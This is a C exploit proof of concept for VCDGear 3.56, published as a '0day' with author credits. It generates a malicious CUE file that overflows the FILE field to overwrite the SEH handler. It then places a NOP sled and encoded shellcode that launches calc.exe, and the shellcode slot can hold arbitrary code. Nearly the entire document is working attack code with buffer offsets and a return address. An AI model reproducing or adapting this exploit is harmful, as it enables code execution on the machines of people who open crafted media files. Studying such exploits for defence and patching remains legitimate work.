VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit
/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
Discovered by: C-W-M
Auther: C-W-M ~ Www.MeftunNet.Com & Www.HackerSecurity.Org
Location : Turkey...
Attack Vector: SEH overwrite
Type: Local
Tested on Win2k SP4 (English)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Software: VCDGear v3.56 build 050213
Website: www.vcdgear.com
Description:
"VCDGear is a program designed to allow a user to extract MPEG streams from CD
images, convert VCD files to MPEG,
correct MPEG errors, and more -- all in a single step. Initially developed back
in late 1997, the program has
grown to do various extractions, conversions, and corrections on the fly.
Cross-platform support will allow
different machines to process and generate output that is compatible between
one another.
Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode
room for - 2180]
Greetz: Ekobar, Poizonb0X, eno7, Doublekickx #pen15
*/
#include <stdlib.h>
#include <stdio.h>
// Exec Calc.exe Scode
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
int main(int argc, char *argv[])
{
FILE *handle;
if(argc < 2) {
printf("0day VCDGear exploit\n");
printf("Usage: %s <output CUE file>", argv[0]);
return 0;
}
if(!(handle = fopen(argv[1], "w"))) {
printf("[+] Error");
return 0;
}
fputs("FILE \"", handle);
for (int i=0;i<324;i++) \
fputs("A", handle);
fputs("\xeb\x32\x90\x90", handle);
fputs("\x3a\x1f\x03\x75", handle); //pop edi, pop esi, retn in
ws2_32.dll (English / 5.0.2195.6601)
for (i=0;i<200;i++)
fputs("\x90", handle);
fputs((char *)scode, handle);
fputs("\" BINARY\n", handle);
fputs(" TRACK 01 MODE2/2352\n", handle);
fputs(" INDEX 01 00:00:00\n", handle);
fclose(handle);
printf("[+] File successfully created");
return 0;
}